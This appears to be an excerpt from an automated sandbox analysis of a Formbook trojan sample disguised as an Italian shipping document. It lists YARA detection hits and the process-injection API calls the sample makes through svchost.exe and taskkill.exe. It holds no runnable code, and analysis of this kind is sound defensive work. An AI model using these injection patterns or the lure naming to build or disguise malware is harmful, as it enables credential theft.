            Source: 00000006.00000002.3591841259.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3600066837.0000000008F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3593251845.00000000028D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3591581349.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2132078710.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2131255938.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: AWB_5771388044 Documenti di spedizione.exe
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004FC303 NtClose,1_2_004FC303
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72B60 NtClose,LdrInitializeThunk,1_2_02F72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_02F72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F735C0 NtCreateMutant,LdrInitializeThunk,1_2_02F735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F74340 NtSetContextThread,1_2_02F74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F74650 NtSuspendThread,1_2_02F74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72AF0 NtWriteFile,1_2_02F72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72AD0 NtReadFile,1_2_02F72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72AB0 NtWaitForSingleObject,1_2_02F72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72BF0 NtAllocateVirtualMemory,1_2_02F72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72BE0 NtQueryValueKey,1_2_02F72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72BA0 NtEnumerateValueKey,1_2_02F72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72B80 NtQueryInformationFile,1_2_02F72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72EE0 NtQueueApcThread,1_2_02F72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72EA0 NtAdjustPrivilegesToken,1_2_02F72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72E80 NtReadVirtualMemory,1_2_02F72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72E30 NtWriteVirtualMemory,1_2_02F72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72FE0 NtCreateFile,1_2_02F72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72FB0 NtResumeThread,1_2_02F72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72FA0 NtQuerySection,1_2_02F72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72F90 NtProtectVirtualMemory,1_2_02F72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72F60 NtCreateProcessEx,1_2_02F72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72F30 NtCreateSection,1_2_02F72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72CF0 NtOpenProcess,1_2_02F72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72CC0 NtQueryVirtualMemory,1_2_02F72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72CA0 NtQueryInformationToken,1_2_02F72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72C70 NtFreeVirtualMemory,1_2_02F72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72C60 NtCreateKey,1_2_02F72C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72C00 NtQueryInformationProcess,1_2_02F72C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72DD0 NtDelayExecution,1_2_02F72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72DB0 NtEnumerateKey,1_2_02F72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72D30 NtUnmapViewOfSection,1_2_02F72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72D10 NtMapViewOfSection,1_2_02F72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72D00 NtSetInformationFile,1_2_02F72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F73090 NtSetValueKey,1_2_02F73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F73010 NtOpenDirectoryObject,1_2_02F73010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F739B0 NtGetContextThread,1_2_02F739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F73D70 NtOpenThread,1_2_02F73D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F73D10 NtOpenProcessToken,1_2_02F73D10
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05074650 NtSuspendThread,LdrInitializeThunk,6_2_05074650
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05074340 NtSetContextThread,LdrInitializeThunk,6_2_05074340
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05072D10 NtMapViewOfSection,LdrInitializeThunk,6_2_05072D10
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05072D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_05072D30
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05072DD0 NtDelayExecution,LdrInitializeThunk,6_2_05072DD0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05072DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_05072DF0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05072C60 NtCreateKey,LdrInitializeThunk,6_2_05072C60
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05072C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_05072C70
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05072CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_05072CA0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05072F30 NtCreateSection,LdrInitializeThunk,6_2_05072F30
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05072FB0 NtResumeThread,LdrInitializeThunk,6_2_05072FB0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05072FE0 NtCreateFile,LdrInitializeThunk,6_2_05072FE0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05072EE0 NtQueueApcThread,LdrInitializeThunk,6_2_05072EE0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05072B60 NtClose,LdrInitializeThunk,6_2_05072B60
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05072AD0 NtReadFile,LdrInitializeThunk,6_2_05072AD0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05072AF0 NtWriteFile,LdrInitializeThunk,6_2_05072AF0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050735C0 NtCreateMutant,LdrInitializeThunk,6_2_050735C0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050739B0 NtGetContextThread,LdrInitializeThunk,6_2_050739B0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05072D00 NtSetInformationFile,6_2_05072D00
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05072DB0 NtEnumerateKey,6_2_05072DB0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05072C00 NtQueryInformationProcess,6_2_05072C00
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05072CC0 NtQueryVirtualMemory,6_2_05072CC0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05072CF0 NtOpenProcess,6_2_05072CF0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05072F60 NtCreateProcessEx,6_2_05072F60
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05072F90 NtProtectVirtualMemory,6_2_05072F90
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05072FA0 NtQuerySection,6_2_05072FA0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05072E30 NtWriteVirtualMemory,6_2_05072E30
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05072E80 NtReadVirtualMemory,6_2_05072E80
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05072EA0 NtAdjustPrivilegesToken,6_2_05072EA0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05072B80 NtQueryInformationFile,6_2_05072B80
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05072BA0 NtEnumerateValueKey,6_2_05072BA0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05072BE0 NtQueryValueKey,6_2_05072BE0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05072BF0 NtAllocateVirtualMemory,6_2_05072BF0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05072AB0 NtWaitForSingleObject,6_2_05072AB0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05073010 NtOpenDirectoryObject,6_2_05073010
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05073090 NtSetValueKey,6_2_05073090
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05073D10 NtOpenProcessToken,6_2_05073D10
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05073D70 NtOpenThread,6_2_05073D70
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_02B58ED0 NtReadFile,6_2_02B58ED0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_02B58FC0 NtDeleteFile,6_2_02B58FC0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_02B58D60 NtCreateFile,6_2_02B58D60
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_02B59060 NtClose,6_2_02B59060
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_004096A00_2_004096A0
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0042200C0_2_0042200C
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0041A2170_2_0041A217
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_004122160_2_00412216
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0042435D0_2_0042435D
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_004033C00_2_004033C0
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0044F4300_2_0044F430
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_004125E80_2_004125E8
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0044663B0_2_0044663B
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_004138010_2_00413801
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0042096F0_2_0042096F
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_004129D00_2_004129D0
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_004119E30_2_004119E3
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0041C9AE0_2_0041C9AE
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0047EA6F0_2_0047EA6F
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0040FA100_2_0040FA10
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0044EB590_2_0044EB59
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_00423C810_2_00423C81
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_00411E780_2_00411E78
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_00442E0C0_2_00442E0C
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_00420EC00_2_00420EC0
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0044CF170_2_0044CF17
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_00444FD20_2_00444FD2
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_041726200_2_04172620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004E83D31_2_004E83D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004D30201_2_004D3020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004FE8E31_2_004FE8E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004DFC7A1_2_004DFC7A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004D248C1_2_004D248C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004DFC831_2_004DFC83
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004D24901_2_004D2490
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004E65B31_2_004E65B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004DFEA31_2_004DFEA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004DDF231_2_004DDF23
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC02C01_2_02FC02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE02741_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030003E61_2_030003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E3F01_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFA3521_2_02FFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030001AA1_2_030001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD20001_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF81CC1_2_02FF81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF41A21_2_02FF41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC81581_2_02FC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA1181_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F301001_2_02F30100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5C6E01_2_02F5C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3C7C01_2_02F3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F407701_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F647501_2_02F64750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEE4F61_2_02FEE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030005911_2_03000591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF24461_2_02FF2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE44201_2_02FE4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F405351_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA801_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF6BD71_2_02FF6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFAB401_2_02FFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E8F01_2_02F6E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F268B81_2_02F268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300A9A61_2_0300A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4A8401_2_02F4A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F428401_2_02F42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A01_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F569621_2_02F56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFEEDB1_2_02FFEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52E901_2_02F52E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFCE931_2_02FFCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40E591_2_02F40E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFEE261_2_02FFEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F32FC81_2_02F32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBEFA01_2_02FBEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB4F401_2_02FB4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F60F301_2_02F60F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE2F301_2_02FE2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F82F281_2_02F82F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30CF21_2_02F30CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0CB51_2_02FE0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40C001_2_02F40C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3ADE01_2_02F3ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F58DBF1_2_02F58DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDCD1F1_2_02FDCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4AD001_2_02F4AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5D2F01_2_02F5D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE12ED1_2_02FE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5B2C01_2_02F5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F452A01_2_02F452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F8739A1_2_02F8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2D34C1_2_02F2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF132D1_2_02FF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF70E91_2_02FF70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFF0E01_2_02FFF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEF0CC1_2_02FEF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F470C01_2_02F470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300B16B1_2_0300B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4B1B01_2_02F4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2F1721_2_02F2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F7516C1_2_02F7516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF16CC1_2_02FF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFF7B01_2_02FFF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F314601_2_02F31460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFF43F1_2_02FFF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDD5B01_2_02FDD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF75711_2_02FF7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEDAC61_2_02FEDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDDAAC1_2_02FDDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F85AA01_2_02F85AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE1AA31_2_02FE1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB3A6C1_2_02FB3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFFA491_2_02FFFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF7A461_2_02FF7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB5BF01_2_02FB5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F7DBF91_2_02F7DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5FB801_2_02F5FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFFB761_2_02FFFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F438E01_2_02F438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAD8001_2_02FAD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F499501_2_02F49950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5B9501_2_02F5B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD59101_2_02FD5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F49EB01_2_02F49EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFFFB11_2_02FFFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F41F921_2_02F41F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFFF091_2_02FFFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFFCF21_2_02FFFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB9C321_2_02FB9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5FDC01_2_02F5FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF7D731_2_02FF7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF1D5A1_2_02FF1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F43D401_2_02F43D40
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeCode function: 5_2_08F409BC5_2_08F409BC
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeCode function: 5_2_08F2538C5_2_08F2538C
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeCode function: 5_2_08F2A4AC5_2_08F2A4AC
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeCode function: 5_2_08F26DFC5_2_08F26DFC
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeCode function: 5_2_08F21D535_2_08F21D53
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeCode function: 5_2_08F21D5C5_2_08F21D5C
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeCode function: 5_2_08F2868C5_2_08F2868C
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeCode function: 5_2_08F1FFFC5_2_08F1FFFC
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeCode function: 5_2_08F21F7C5_2_08F21F7C
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050405356_2_05040535
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_051005916_2_05100591
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050E44206_2_050E4420
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050F24466_2_050F2446
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050EE4F66_2_050EE4F6
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050647506_2_05064750
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050407706_2_05040770
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_0503C7C06_2_0503C7C0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_0505C6E06_2_0505C6E0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050301006_2_05030100
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050DA1186_2_050DA118
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050C81586_2_050C8158
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_051001AA6_2_051001AA
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050F81CC6_2_050F81CC
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050D20006_2_050D2000
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050FA3526_2_050FA352
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_0504E3F06_2_0504E3F0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_051003E66_2_051003E6
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050E02746_2_050E0274
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050C02C06_2_050C02C0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_0504AD006_2_0504AD00
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050DCD1F6_2_050DCD1F
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05058DBF6_2_05058DBF
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_0503ADE06_2_0503ADE0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05040C006_2_05040C00
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050E0CB56_2_050E0CB5
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05030CF26_2_05030CF2
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05082F286_2_05082F28
